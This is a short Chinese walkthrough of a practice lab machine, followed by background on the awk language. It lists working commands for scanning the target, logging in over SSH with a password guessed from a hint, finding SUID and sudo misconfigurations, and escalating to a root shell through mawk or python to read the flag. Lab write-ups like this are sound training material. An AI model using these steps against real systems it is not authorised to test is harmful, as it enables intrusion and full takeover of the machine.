1.主机发现:arp-scan -l,发现靶机ip为192.168.225.148,并进行访问
2.扫描端口,开启了80,22端口
nmap 192.168.225.148 -sV -sC -Pn -n -v -T5 -p-
3.扫目录发现admin的页面,进行访问:
dirb http://192.168.225.148
3.发现note.txt,根据提示:他不懂技术,不会改密码,所以猜测靶机密码为:12345ted123
4.尝试远程登录一下:
ssh 192.168.225.148 -l ted
5.比DC系列容易一些,远程登录后就可以按照常规思路进行提权,先查找SUID提权方案:
find / -perm -u=s -type f 2>/dev/null
也可以使用一下命令,发现不需要密码的awk:
cat /etc/sudoers
6.方法一:直接使用此命令进行提权:
mawk 'BEGIN {system("/bin/sh")}'
7.方法二:
这里因为python也存在SUID的权限,那么也是可以提权的
python2.7 -c 'import pty;pty.spawn("/bin/sh")'
8.因为,直接查看flag:
/usr/bin/mawk 'BEGIN{system("whoami")}'
/usr/bin/mawk 'BEGIN{system("ls /root")}' //发现flag
/usr/bin/mawk 'BEGIN{system("cat /root/flag.txt ./")}'
提权awk科普:
awk是一种编程语言,用于在linux/unix下对文本和数据进行处理。数据可以来自标准输入、一个或多个文件,或其它命令的输出(即管道)。它支持用户自定义函数和动态正则表达式等先进功能,是linux/unix下的一个强大编程工具。它在命令行中使用,但更多是作为脚本来使用。
awk的处理文本和数据的方式是这样的,它逐行扫描文件,从第一行到最后一行,寻找匹配的特定模式的行,并在这些行上进行你想要的操作。如果没有指定处理动作,则把匹配的行显示到标准输出(屏幕),即默认处理动作是print;如果没有指定模式,则所有被操作所指定的行都被处理,即默认指定模式是全部。
awk分别代表其作者姓氏的第一个字母。因为它的作者是三个人,分别是Alfred Aho、Brian Kernighan、Peter Weinberger。gawk是awk的GNU版本,它提供了Bell实验室和GNU的一些扩展。
像shell一样,awk也有好几种,常见的如awk、nawk、mawk、gawk